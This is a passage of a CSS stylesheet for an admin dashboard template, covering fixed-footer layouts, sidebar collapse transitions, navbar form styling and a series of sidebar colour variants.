left: 0;
position: fixed;
right: 0;
z-index: 1032;
}
.layout-footer-not-fixed .wrapper .main-footer {
position: static;
}
.layout-footer-not-fixed .wrapper .content-wrapper {
margin-bottom: 0;
}
.layout-footer-fixed .wrapper .control-sidebar {
bottom: 0;
}
.layout-footer-fixed .wrapper .main-footer {
bottom: 0;
left: 0;
position: fixed;
right: 0;
z-index: 1032;
}
.layout-footer-fixed .wrapper .content-wrapper {
margin-bottom: calc(3.5rem + 1px);
}
.layout-footer-not-fixed .wrapper .main-footer {
position: static;
}
@media (min-width: 576px) {
.layout-sm-footer-fixed .wrapper .control-sidebar {
bottom: 0;
}
.layout-sm-footer-fixed .wrapper .main-footer {
bottom: 0;
left: 0;
position: fixed;
right: 0;
z-index: 1032;
}
.layout-sm-footer-fixed .wrapper .content-wrapper {
margin-bottom: calc(3.5rem + 1px);
}
.layout-sm-footer-not-fixed .wrapper .main-footer {
position: static;
}
}
@media (min-width: 768px) {
.layout-md-footer-fixed .wrapper .control-sidebar {
bottom: 0;
}
.layout-md-footer-fixed .wrapper .main-footer {
bottom: 0;
left: 0;
position: fixed;
right: 0;
z-index: 1032;
}
.layout-md-footer-fixed .wrapper .content-wrapper {
margin-bottom: calc(3.5rem + 1px);
}
.layout-md-footer-not-fixed .wrapper .main-footer {
position: static;
}
}
@media (min-width: 992px) {
.layout-lg-footer-fixed .wrapper .control-sidebar {
bottom: 0;
}
.layout-lg-footer-fixed .wrapper .main-footer {
bottom: 0;
left: 0;
position: fixed;
right: 0;
z-index: 1032;
}
.layout-lg-footer-fixed .wrapper .content-wrapper {
margin-bottom: calc(3.5rem + 1px);
}
.layout-lg-footer-not-fixed .wrapper .main-footer {
position: static;
}
}
@media (min-width: 1200px) {
.layout-xl-footer-fixed .wrapper .control-sidebar {
bottom: 0;
}
.layout-xl-footer-fixed .wrapper .main-footer {
bottom: 0;
left: 0;
position: fixed;
right: 0;
z-index: 1032;
}
.layout-xl-footer-fixed .wrapper .content-wrapper {
margin-bottom: calc(3.5rem + 1px);
}
.layout-xl-footer-not-fixed .wrapper .main-footer {
position: static;
}
}
.layout-top-nav .wrapper {
margin-left: 0;
}
.layout-top-nav .wrapper .main-header .brand-image {
margin-top: -.5rem;
margin-right: .2rem;
height: 33px;
}
.layout-top-nav .wrapper .main-sidebar {
bottom: inherit;
height: inherit;
}
.layout-top-nav .wrapper .content-wrapper,
.layout-top-nav .wrapper .main-header,
.layout-top-nav .wrapper .main-footer {
margin-left: 0;
}
body.sidebar-collapse:not(.sidebar-mini-md):not(.sidebar-mini) .content-wrapper, body.sidebar-collapse:not(.sidebar-mini-md):not(.sidebar-mini) .content-wrapper::before,
body.sidebar-collapse:not(.sidebar-mini-md):not(.sidebar-mini) .main-footer,
body.sidebar-collapse:not(.sidebar-mini-md):not(.sidebar-mini) .main-footer::before,
body.sidebar-collapse:not(.sidebar-mini-md):not(.sidebar-mini) .main-header,
body.sidebar-collapse:not(.sidebar-mini-md):not(.sidebar-mini) .main-header::before {
margin-left: 0;
}
@media (min-width: 768px) {
body:not(.sidebar-mini-md) .content-wrapper,
body:not(.sidebar-mini-md) .main-footer,
body:not(.sidebar-mini-md) .main-header {
transition: margin-left 0.3s ease-in-out;
margin-left: 250px;
}
}
@media (min-width: 768px) and (prefers-reduced-motion: reduce) {
body:not(.sidebar-mini-md) .content-wrapper,
body:not(.sidebar-mini-md) .main-footer,
body:not(.sidebar-mini-md) .main-header {
transition: none;
}
}
@media (min-width: 768px) {
.sidebar-collapse body:not(.sidebar-mini-md) .content-wrapper, .sidebar-collapse
body:not(.sidebar-mini-md) .main-footer, .sidebar-collapse
body:not(.sidebar-mini-md) .main-header {
margin-left: 0;
}
}
@media (max-width: 991.98px) {
body:not(.sidebar-mini-md) .content-wrapper, body:not(.sidebar-mini-md) .content-wrapper::before,
body:not(.sidebar-mini-md) .main-footer,
body:not(.sidebar-mini-md) .main-footer::before,
body:not(.sidebar-mini-md) .main-header,
body:not(.sidebar-mini-md) .main-header::before {
margin-left: 0;
}
}
@media (min-width: 768px) {
.sidebar-mini-md .content-wrapper,
.sidebar-mini-md .main-footer,
.sidebar-mini-md .main-header {
transition: margin-left 0.3s ease-in-out;
margin-left: 250px;
}
}
@media (min-width: 768px) and (prefers-reduced-motion: reduce) {
.sidebar-mini-md .content-wrapper,
.sidebar-mini-md .main-footer,
.sidebar-mini-md .main-header {
transition: none;
}
}
@media (min-width: 768px) {
.sidebar-collapse .sidebar-mini-md .content-wrapper, .sidebar-collapse
.sidebar-mini-md .main-footer, .sidebar-collapse
.sidebar-mini-md .main-header {
margin-left: 4.6rem;
}
}
@media (max-width: 991.98px) {
.sidebar-mini-md .content-wrapper, .sidebar-mini-md .content-wrapper::before,
.sidebar-mini-md .main-footer,
.sidebar-mini-md .main-footer::before,
.sidebar-mini-md .main-header,
.sidebar-mini-md .main-header::before {
margin-left: 4.6rem;
}
}
.content-wrapper {
background: #f4f6f9;
}
.content-wrapper > .content {
padding: 0 0.5rem;
}
.main-sidebar, .main-sidebar::before {
transition: margin-left 0.3s ease-in-out, width 0.3s ease-in-out;
width: 250px;
}
@media (prefers-reduced-motion: reduce) {
.main-sidebar, .main-sidebar::before {
transition: none;
}
}
.sidebar-collapse:not(.sidebar-mini):not(.sidebar-mini-md) .main-sidebar, .sidebar-collapse:not(.sidebar-mini):not(.sidebar-mini-md) .main-sidebar::before {
box-shadow: none !important;
}
.sidebar-collapse .main-sidebar, .sidebar-collapse .main-sidebar::before {
margin-left: -250px;
}
.sidebar-collapse .main-sidebar .nav-sidebar.nav-child-indent .nav-treeview {
padding: 0;
}
@media (max-width: 767.98px) {
.main-sidebar, .main-sidebar::before {
box-shadow: none !important;
margin-left: -250px;
}
.sidebar-open .main-sidebar, .sidebar-open .main-sidebar::before {
margin-left: 0;
}
}
:not(.layout-fixed) .main-sidebar {
height: inherit;
min-height: 100%;
position: absolute;
top: 0;
}
.layout-fixed .brand-link {
width: 250px;
}
.layout-fixed .main-sidebar {
bottom: 0;
float: none;
height: 100vh;
left: 0;
position: fixed;
top: 0;
}
.layout-fixed .control-sidebar {
bottom: 0;
float: none;
height: 100vh;
position: fixed;
top: 0;
}
.layout-fixed .control-sidebar .control-sidebar-content {
height: calc(100vh - calc(3.5rem + 1px));
}
.main-footer {
background: #ffffff;
border-top: 1px solid #dee2e6;
color: #869099;
padding: 1rem;
}
.text-sm .main-footer, .main-footer.text-sm {
padding: 0.812rem;
}
.content-header {
padding: 15px 0.5rem;
}
.text-sm .content-header {
padding: 10px 0.5rem;
}
.content-header h1 {
font-size: 1.8rem;
margin: 0;
}
.text-sm .content-header h1 {
font-size: 1.5rem;
}
.content-header .breadcrumb {
background: transparent;
line-height: 1.8rem;
margin-bottom: 0;
padding: 0;
}
.text-sm .content-header .breadcrumb {
line-height: 1.5rem;
}
.hold-transition .content-wrapper,
.hold-transition .main-header,
.hold-transition .main-sidebar,
.hold-transition .main-sidebar *,
.hold-transition .control-sidebar,
.hold-transition .control-sidebar *,
.hold-transition .main-footer {
transition: none !important;
}
.main-header {
border-bottom: 1px solid #dee2e6;
z-index: 1034;
}
.main-header .nav-link {
height: 2.5rem;
position: relative;
}
.text-sm .main-header .nav-link, .main-header.text-sm .nav-link {
height: 1.93725rem;
padding: 0.35rem 1rem;
}
.text-sm .main-header .nav-link > .fa,
.text-sm .main-header .nav-link > .fas,
.text-sm .main-header .nav-link > .far,
.text-sm .main-header .nav-link > .fab,
.text-sm .main-header .nav-link > .glyphicon,
.text-sm .main-header .nav-link > .ion, .main-header.text-sm .nav-link > .fa,
.main-header.text-sm .nav-link > .fas,
.main-header.text-sm .nav-link > .far,
.main-header.text-sm .nav-link > .fab,
.main-header.text-sm .nav-link > .glyphicon,
.main-header.text-sm .nav-link > .ion {
font-size: 0.875rem;
}
.main-header .navbar-nav .nav-item {
margin: 0;
}
.main-header .navbar-nav[class*='-right'] .dropdown-menu {
left: auto;
margin-top: -3px;
right: 0;
}
@media (max-width: 575.98px) {
.main-header .navbar-nav[class*='-right'] .dropdown-menu {
left: 0;
right: auto;
}
}
.navbar-img {
height: calc(3.5rem + 1px)/2;
width: auto;
}
.navbar-badge {
font-size: .6rem;
font-weight: 300;
padding: 2px 4px;
position: absolute;
right: 5px;
top: 9px;
}
.btn-navbar {
background-color: transparent;
border-left-width: 0;
}
.form-control-navbar {
border-right-width: 0;
}
.form-control-navbar + .input-group-append {
margin-left: 0;
}
.form-control-navbar,
.btn-navbar {
transition: none;
}
.navbar-dark .form-control-navbar,
.navbar-dark .btn-navbar {
background-color: rgba(255, 255, 255, 0.2);
border: 0;
}
.navbar-dark .form-control-navbar::-webkit-input-placeholder {
color: rgba(255, 255, 255, 0.6);
}
.navbar-dark .form-control-navbar::-moz-placeholder {
color: rgba(255, 255, 255, 0.6);
}
.navbar-dark .form-control-navbar:-ms-input-placeholder {
color: rgba(255, 255, 255, 0.6);
}
.navbar-dark .form-control-navbar::-ms-input-placeholder {
color: rgba(255, 255, 255, 0.6);
}
.navbar-dark .form-control-navbar::placeholder {
color: rgba(255, 255, 255, 0.6);
}
.navbar-dark .form-control-navbar + .input-group-append > .btn-navbar {
color: rgba(255, 255, 255, 0.6);
}
.navbar-dark .form-control-navbar:focus,
.navbar-dark .form-control-navbar:focus + .input-group-append .btn-navbar {
background-color: rgba(255, 255, 255, 0.6);
border: 0 !important;
color: #343a40;
}
.navbar-light .form-control-navbar,
.navbar-light .btn-navbar {
background-color: #f2f4f6;
border: 0;
}
.navbar-light .form-control-navbar::-webkit-input-placeholder {
color: rgba(0, 0, 0, 0.6);
}
.navbar-light .form-control-navbar::-moz-placeholder {
color: rgba(0, 0, 0, 0.6);
}
.navbar-light .form-control-navbar:-ms-input-placeholder {
color: rgba(0, 0, 0, 0.6);
}
.navbar-light .form-control-navbar::-ms-input-placeholder {
color: rgba(0, 0, 0, 0.6);
}
.navbar-light .form-control-navbar::placeholder {
color: rgba(0, 0, 0, 0.6);
}
.navbar-light .form-control-navbar + .input-group-append > .btn-navbar {
color: rgba(0, 0, 0, 0.6);
}
.navbar-light .form-control-navbar:focus,
.navbar-light .form-control-navbar:focus + .input-group-append .btn-navbar {
background-color: #e9ecef;
border: 0 !important;
color: #343a40;
}
.brand-link {
display: block;
font-size: 1.25rem;
line-height: 1.5;
padding: 0.8125rem 0.5rem;
transition: width 0.3s ease-in-out;
white-space: nowrap;
}
.brand-link:hover {
color: #ffffff;
text-decoration: none;
}
.text-sm .brand-link {
font-size: inherit;
}
[class*='sidebar-dark'] .brand-link {
border-bottom: 1px solid #4b545c;
color: rgba(255, 255, 255, 0.8);
}
[class*='sidebar-light'] .brand-link {
border-bottom: 1px solid #dee2e6;
color: rgba(0, 0, 0, 0.8);
}
.brand-link .brand-image {
float: left;
line-height: .8;
margin-left: .8rem;
margin-right: .5rem;
margin-top: -3px;
max-height: 33px;
width: auto;
}
.brand-link .brand-image-xs {
float: left;
line-height: .8;
margin-top: -.1rem;
max-height: 33px;
width: auto;
}
.brand-link .brand-image-xl {
line-height: .8;
max-height: 40px;
width: auto;
}
.brand-link.text-sm .brand-image,
.text-sm .brand-link .brand-image {
height: 29px;
margin-bottom: -.25rem;
margin-left: .95rem;
margin-top: -.25rem;
}
.brand-link.text-sm .brand-image-xs,
.text-sm .brand-link .brand-image-xs {
margin-top: -.2rem;
max-height: 29px;
}
.brand-link.text-sm .brand-image-xl,
.text-sm .brand-link .brand-image-xl {
margin-top: -.225rem;
max-height: 38px;
}
.main-sidebar {
height: 100vh;
overflow-y: hidden;
z-index: 1038;
}
.main-sidebar a:-moz-focusring {
border: 0;
outline: none;
}
.sidebar {
height: calc(100% - (3.5rem + 1px));
overflow-y: auto;
padding-bottom: 0;
padding-left: 0.5rem;
padding-right: 0.5rem;
padding-top: 0;
}
.user-panel {
position: relative;
}
[class*='sidebar-dark'] .user-panel {
border-bottom: 1px solid #4f5962;
}
[class*='sidebar-light'] .user-panel {
border-bottom: 1px solid #dee2e6;
}
.user-panel,
.user-panel .info {
overflow: hidden;
white-space: nowrap;
}
.user-panel .image {
display: inline-block;
padding-left: 0.8rem;
}
.user-panel img {
height: auto;
width: 2.1rem;
}
.user-panel .info {
display: inline-block;
padding: 5px 5px 5px 10px;
}
.user-panel .status,
.user-panel .dropdown-menu {
font-size: 0.875rem;
}
.nav-sidebar .nav-item > .nav-link {
margin-bottom: .2rem;
}
.nav-sidebar .nav-item > .nav-link .right {
transition: -webkit-transform ease-in-out 0.3s;
transition: transform ease-in-out 0.3s;
transition: transform ease-in-out 0.3s, -webkit-transform ease-in-out 0.3s;
}
@media (prefers-reduced-motion: reduce) {
.nav-sidebar .nav-item > .nav-link .right {
transition: none;
}
}
.nav-sidebar .nav-link > .right,
.nav-sidebar .nav-link > p > .right {
position: absolute;
right: 1rem;
top: .7rem;
}
.nav-sidebar .nav-link > .right i,
.nav-sidebar .nav-link > .right span,
.nav-sidebar .nav-link > p > .right i,
.nav-sidebar .nav-link > p > .right span {
margin-left: .5rem;
}
.nav-sidebar .nav-link > .right:nth-child(2),
.nav-sidebar .nav-link > p > .right:nth-child(2) {
right: 2.2rem;
}
.nav-sidebar .menu-open > .nav-treeview {
display: block;
}
.nav-sidebar .menu-open > .nav-link i.right {
-webkit-transform: rotate(-90deg);
transform: rotate(-90deg);
}
.nav-sidebar > .nav-item {
margin-bottom: 0;
}
.nav-sidebar > .nav-item .nav-icon {
margin-left: .05rem;
font-size: 1.2rem;
margin-right: .2rem;
text-align: center;
width: 1.6rem;
}
.nav-sidebar > .nav-item .nav-icon.fa, .nav-sidebar > .nav-item .nav-icon.fas, .nav-sidebar > .nav-item .nav-icon.far, .nav-sidebar > .nav-item .nav-icon.fab, .nav-sidebar > .nav-item .nav-icon.glyphicon, .nav-sidebar > .nav-item .nav-icon.ion {
font-size: 1.1rem;
}
.nav-sidebar > .nav-item .float-right {
margin-top: 3px;
}
.nav-sidebar .nav-treeview {
display: none;
list-style: none;
padding: 0;
}
.nav-sidebar .nav-treeview > .nav-item > .nav-link > .nav-icon {
width: 1.6rem;
}
.nav-sidebar.nav-child-indent .nav-treeview {
transition: padding 0.3s ease-in-out;
padding-left: 1rem;
}
.text-sm .nav-sidebar.nav-child-indent .nav-treeview {
padding-left: .5rem;
}
.nav-sidebar.nav-child-indent.nav-legacy .nav-treeview .nav-treeview {
padding-left: 2rem;
margin-left: -1rem;
}
.text-sm .nav-sidebar.nav-child-indent.nav-legacy .nav-treeview .nav-treeview {
padding-left: 1rem;
margin-left: -.5rem;
}
.nav-sidebar .nav-header {
font-size: .9rem;
padding: 0.5rem;
}
.nav-sidebar .nav-header:not(:first-of-type) {
padding: 1.7rem 1rem .5rem;
}
.nav-sidebar .nav-link p {
display: inline-block;
margin: 0;
}
#sidebar-overlay {
background-color: rgba(0, 0, 0, 0.1);
bottom: 0;
display: none;
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1037;
}
@media (max-width: 991.98px) {
.sidebar-open #sidebar-overlay {
display: block;
}
}
[class*='sidebar-light-'] {
background-color: #ffffff;
}
[class*='sidebar-light-'] .user-panel a:hover {
color: #212529;
}
[class*='sidebar-light-'] .user-panel .status {
background: rgba(0, 0, 0, 0.1);
color: #343a40;
}
[class*='sidebar-light-'] .user-panel .status:hover, [class*='sidebar-light-'] .user-panel .status:focus, [class*='sidebar-light-'] .user-panel .status:active {
background: rgba(0, 0, 0, 0.1);
color: #212529;
}
[class*='sidebar-light-'] .user-panel .dropdown-menu {
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.4);
border-color: rgba(0, 0, 0, 0.1);
}
[class*='sidebar-light-'] .user-panel .dropdown-item {
color: #212529;
}
[class*='sidebar-light-'] .nav-sidebar > .nav-item > .nav-link:active, [class*='sidebar-light-'] .nav-sidebar > .nav-item > .nav-link:focus {
color: #343a40;
}
[class*='sidebar-light-'] .nav-sidebar > .nav-item.menu-open > .nav-link,
[class*='sidebar-light-'] .nav-sidebar > .nav-item:hover > .nav-link {
background-color: rgba(0, 0, 0, 0.1);
color: #212529;
}
[class*='sidebar-light-'] .nav-sidebar > .nav-item > .nav-link.active {
color: #000;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
}
[class*='sidebar-light-'] .nav-sidebar > .nav-item > .nav-treeview {
background: transparent;
}
[class*='sidebar-light-'] .nav-header {
background: inherit;
color: #292d32;
}
[class*='sidebar-light-'] .sidebar a {
color: #343a40;
}
[class*='sidebar-light-'] .sidebar a:hover {
text-decoration: none;
}
[class*='sidebar-light-'] .nav-treeview > .nav-item > .nav-link {
color: #777;
}
[class*='sidebar-light-'] .nav-treeview > .nav-item > .nav-link.active, [class*='sidebar-light-'] .nav-treeview > .nav-item > .nav-link.active:hover {
background-color: rgba(0, 0, 0, 0.1);
color: #212529;
}
[class*='sidebar-light-'] .nav-treeview > .nav-item > .nav-link:hover {
background-color: rgba(0, 0, 0, 0.1);
}
[class*='sidebar-light-'] .nav-flat .nav-item .nav-treeview .nav-treeview {
border-color: rgba(0, 0, 0, 0.1);
}
[class*='sidebar-light-'] .nav-flat .nav-item .nav-treeview > .nav-item > .nav-link, [class*='sidebar-light-'] .nav-flat .nav-item .nav-treeview > .nav-item > .nav-link.active {
border-color: rgba(0, 0, 0, 0.1);
}
[class*='sidebar-dark-'] {
background-color: #343a40;
}
[class*='sidebar-dark-'] .user-panel a:hover {
color: #ffffff;
}
[class*='sidebar-dark-'] .user-panel .status {
background: rgba(255, 255, 255, 0.1);
color: #C2C7D0;
}
[class*='sidebar-dark-'] .user-panel .status:hover, [class*='sidebar-dark-'] .user-panel .status:focus, [class*='sidebar-dark-'] .user-panel .status:active {
background: rgba(247, 247, 247, 0.1);
color: #ffffff;
}
[class*='sidebar-dark-'] .user-panel .dropdown-menu {
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.4);
border-color: rgba(242, 242, 242, 0.1);
}
[class*='sidebar-dark-'] .user-panel .dropdown-item {
color: #212529;
}
[class*='sidebar-dark-'] .nav-sidebar > .nav-item > .nav-link:active {
color: #C2C7D0;
}
[class*='sidebar-dark-'] .nav-sidebar > .nav-item.menu-open > .nav-link,
[class*='sidebar-dark-'] .nav-sidebar > .nav-item:hover > .nav-link,
[class*='sidebar-dark-'] .nav-sidebar > .nav-item > .nav-link:focus {
background-color: rgba(255, 255, 255, 0.1);
color: #ffffff;
}
[class*='sidebar-dark-'] .nav-sidebar > .nav-item > .nav-link.active {
color: #ffffff;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
}
[class*='sidebar-dark-'] .nav-sidebar > .nav-item > .nav-treeview {
background: transparent;
}
[class*='sidebar-dark-'] .nav-header {
background: inherit;
color: #d0d4db;
}
[class*='sidebar-dark-'] .sidebar a {
color: #C2C7D0;
}
[class*='sidebar-dark-'] .sidebar a:hover, [class*='sidebar-dark-'] .sidebar a:focus {
text-decoration: none;
}
[class*='sidebar-dark-'] .nav-treeview > .nav-item > .nav-link {
color: #C2C7D0;
}
[class*='sidebar-dark-'] .nav-treeview > .nav-item > .nav-link:hover, [class*='sidebar-dark-'] .nav-treeview > .nav-item > .nav-link:focus {
background-color: rgba(255, 255, 255, 0.1);
color: #ffffff;
}
[class*='sidebar-dark-'] .nav-treeview > .nav-item > .nav-link.active, [class*='sidebar-dark-'] .nav-treeview > .nav-item > .nav-link.active:hover, [class*='sidebar-dark-'] .nav-treeview > .nav-item > .nav-link.active:focus {
background-color: rgba(255, 255, 255, 0.9);
color: #343a40;
}
[class*='sidebar-dark-'] .nav-flat .nav-item .nav-treeview .nav-treeview {
border-color: rgba(255, 255, 255, 0.9);
}
[class*='sidebar-dark-'] .nav-flat .nav-item .nav-treeview > .nav-item > .nav-link, [class*='sidebar-dark-'] .nav-flat .nav-item .nav-treeview > .nav-item > .nav-link.active {
border-color: rgba(255, 255, 255, 0.9);
}
.sidebar-dark-primary .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-primary .nav-sidebar > .nav-item > .nav-link.active {
background-color: #007bff;
color: #ffffff;
}
.sidebar-dark-primary .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-primary .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #007bff;
}
.sidebar-dark-secondary .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-secondary .nav-sidebar > .nav-item > .nav-link.active {
background-color: #6c757d;
color: #ffffff;
}
.sidebar-dark-secondary .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-secondary .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #6c757d;
}
.sidebar-dark-success .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-success .nav-sidebar > .nav-item > .nav-link.active {
background-color: #28a745;
color: #ffffff;
}
.sidebar-dark-success .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-success .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #28a745;
}
.sidebar-dark-info .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-info .nav-sidebar > .nav-item > .nav-link.active {
background-color: #17a2b8;
color: #ffffff;
}
.sidebar-dark-info .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-info .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #17a2b8;
}
.sidebar-dark-warning .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-warning .nav-sidebar > .nav-item > .nav-link.active {
background-color: #ffc107;
color: #1F2D3D;
}
.sidebar-dark-warning .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-warning .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #ffc107;
}
.sidebar-dark-danger .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-danger .nav-sidebar > .nav-item > .nav-link.active {
background-color: #dc3545;
color: #ffffff;
}
.sidebar-dark-danger .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-danger .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #dc3545;
}
.sidebar-dark-light .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-light .nav-sidebar > .nav-item > .nav-link.active {
background-color: #f8f9fa;
color: #1F2D3D;
}
.sidebar-dark-light .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-light .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #f8f9fa;
}
.sidebar-dark-dark .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-dark .nav-sidebar > .nav-item > .nav-link.active {
background-color: #343a40;
color: #ffffff;
}
.sidebar-dark-dark .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-dark .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #343a40;
}
.sidebar-dark-lightblue .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-lightblue .nav-sidebar > .nav-item > .nav-link.active {
background-color: #3c8dbc;
color: #ffffff;
}
.sidebar-dark-lightblue .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-lightblue .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #3c8dbc;
}
.sidebar-dark-navy .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-navy .nav-sidebar > .nav-item > .nav-link.active {
background-color: #001f3f;
color: #ffffff;
}
.sidebar-dark-navy .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-navy .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #001f3f;
}
.sidebar-dark-olive .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-olive .nav-sidebar > .nav-item > .nav-link.active {
background-color: #3d9970;
color: #ffffff;
}
.sidebar-dark-olive .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-olive .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #3d9970;
}
.sidebar-dark-lime .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-lime .nav-sidebar > .nav-item > .nav-link.active {
background-color: #01ff70;
color: #1F2D3D;
}
.sidebar-dark-lime .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-lime .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #01ff70;
}
.sidebar-dark-fuchsia .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-fuchsia .nav-sidebar > .nav-item > .nav-link.active {
background-color: #f012be;
color: #ffffff;
}
.sidebar-dark-fuchsia .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-fuchsia .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #f012be;
}
.sidebar-dark-maroon .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-maroon .nav-sidebar > .nav-item > .nav-link.active {
background-color: #d81b60;
color: #ffffff;
}
.sidebar-dark-maroon .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-maroon .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #d81b60;
}
.sidebar-dark-blue .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-blue .nav-sidebar > .nav-item > .nav-link.active {
background-color: #007bff;
color: #ffffff;
}
.sidebar-dark-blue .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-blue .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #007bff;
}
.sidebar-dark-indigo .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-indigo .nav-sidebar > .nav-item > .nav-link.active {
background-color: #6610f2;
color: #ffffff;
}
.sidebar-dark-indigo .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-indigo .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #6610f2;
}
.sidebar-dark-purple .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-purple .nav-sidebar > .nav-item > .nav-link.active {
background-color: #6f42c1;
color: #ffffff;
}
.sidebar-dark-purple .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-purple .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #6f42c1;
}
.sidebar-dark-pink .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-pink .nav-sidebar > .nav-item > .nav-link.active {
background-color: #e83e8c;
color: #ffffff;
}
.sidebar-dark-pink .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-pink .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #e83e8c;
}
.sidebar-dark-red .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-red .nav-sidebar > .nav-item > .nav-link.active {
background-color: #dc3545;
color: #ffffff;
}
.sidebar-dark-red .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-red .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #dc3545;
}
.sidebar-dark-orange .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-orange .nav-sidebar > .nav-item > .nav-link.active {
background-color: #fd7e14;
color: #1F2D3D;
}
.sidebar-dark-orange .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-orange .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #fd7e14;
}
.sidebar-dark-yellow .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-yellow .nav-sidebar > .nav-item > .nav-link.active {
background-color: #ffc107;
color: #1F2D3D;
}
.sidebar-dark-yellow .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-yellow .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #ffc107;
}
.sidebar-dark-green .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-green .nav-sidebar > .nav-item > .nav-link.active {
background-color: #28a745;
color: #ffffff;
}
.sidebar-dark-green .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-green .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #28a745;
}
.sidebar-dark-teal .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-teal .nav-sidebar > .nav-item > .nav-link.active {
background-color: #20c997;
color: #ffffff;
}
.sidebar-dark-teal .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-teal .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #20c997;
}
.sidebar-dark-cyan .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-cyan .nav-sidebar > .nav-item > .nav-link.active {
background-color: #17a2b8;
color: #ffffff;
}
.sidebar-dark-cyan .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-cyan .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #17a2b8;
}
.sidebar-dark-white .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-white .nav-sidebar > .nav-item > .nav-link.active {
background-color: #ffffff;
color: #1F2D3D;
}
.sidebar-dark-white .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-white .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #ffffff;
}
.sidebar-dark-gray .nav-sidebar > .nav-item > .nav-link.active,
.sidebar-light-gray .nav-sidebar > .nav-item > .nav-link.active {
background-color: #6c757d;
color: #ffffff;
}
.sidebar-dark-gray .nav-sidebar.nav-legacy > .nav-item > .nav-link.active,
.sidebar-light-gray .nav-sidebar.nav-legacy > .nav-item > .nav-link.active {
border-color: #6c757d;
}
.sidebar-dark-gray-dark .nav-sidebar > .nav-item > .nav-link.active,
